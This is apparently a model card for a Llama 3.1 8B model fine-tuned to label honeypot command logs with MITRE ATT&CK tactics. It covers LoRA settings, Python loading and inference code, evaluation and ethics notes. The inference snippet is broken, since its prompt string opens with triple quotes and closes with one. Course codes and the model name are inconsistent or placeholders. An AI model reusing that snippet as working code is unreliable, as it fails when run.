LLM-Enhanced Honeypot Log Analysis Model

Model Description

This model is a fine-tuned version of Llama 3.1 8B Instruct, specialized for analyzing honeypot logs and generating MITRE ATT&CK framework annotations. It was developed as part of a research project at Queen's University Belfast investigating automated security log analysis using Large Language Models.

Key Features

MITRE ATT&CK Annotation: Automatically generates structured annotations for security events
Honeypot Log Analysis: Specialized in analyzing Unix terminal logs from honeypot systems
LoRA Fine-tuning: Uses Low-Rank Adaptation for efficient parameter updates
Research-Grade: Developed for academic research in cybersecurity and AI

Model Details

Base Model

Base Model: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit
Model Size: 8B parameters
Architecture: Llama 3.1 with Instruct tuning
Quantization: 4-bit quantization for efficiency

Fine-tuning Details

Method: LoRA (Low-Rank Adaptation)
LoRA Rank: 32
LoRA Alpha: 32
LoRA Dropout: 0
Learning Rate: 0.00012
Batch Size: 2
Gradient Accumulation: 4
Max Steps: 100
Optimizer: adamw_8bit

Training Data

The model was trained on a curated dataset of honeypot logs with human-annotated MITRE ATT&CK framework labels. The training data includes:

Unix terminal command logs from honeypot systems
Structured annotations for 6 key MITRE ATT&CK fields
Balanced representation of different attack tactics and techniques

Usage

Installation

pip install transformers torch unsloth

Loading the Model

from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="your-username/model-name",
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)

Inference

# Enable inference mode
FastLanguageModel.for_inference(model)

# Format your input
prompt = '''Below is a Unix terminal command log from a honeypot system. Please analyze it and provide MITRE ATT&CK framework annotations.

Command: {command}
Timestamp: {timestamp}
Source IP: {source_ip}

Please provide:
1. Tactic
2. Technique
3. Sub-technique
4. Description'

inputs = tokenizer(prompt, return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=1024, temperature=0.7)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)

Evaluation

The model has been evaluated on multiple metrics:

Overall MITRE Accuracy: Novel composite metric combining all 6 MITRE ATT&CK field accuracies
Confusion Matrix Analysis: Visual analysis of tactics classification performance
Field-level Accuracy: Individual accuracy for each MITRE ATT&CK field
Human Evaluation: Expert validation of generated annotations

Limitations

Specialized for honeypot log analysis - may not generalize to other security contexts
Requires structured input format for optimal performance
Training data limited to specific honeypot configurations
May exhibit biases present in training data

Ethical Considerations

This model is designed for defensive cybersecurity research and should be used responsibly:

Intended for legitimate security research and defense applications
Should not be used for malicious purposes or unauthorized access
Users should validate outputs before making security decisions
Consider privacy implications when analyzing logs

Citation

If you use this model in your research, please cite:

@misc{llm_honeypot_analysis_2025,
  title={LLM-Enhanced Honeypot Log Analysis System},
  author={[Student Name]},
  year={2025},
  institution={Queen's University Belfast},
  course={CSC4003 - Research Project},
  url={https://gitlab.eeecs.qub.ac.uk/[student-id]/CSC4003}
}

License

This model is released under the MIT License. See the LICENSE file for details.

Contact

For questions or issues:

Repository: https://gitlab.eeecs.qub.ac.uk/40285272/CSC4006
Institution: Queen's University Belfast
Course: CSC4006 - Research Project

Acknowledgments

Built using the Unsloth library for efficient training
Based on Meta's Llama 3.1 model
Developed as part of cybersecurity research at Queen's University Belfast

JustinYuann
/

CSC4006-CyberSecAnnotation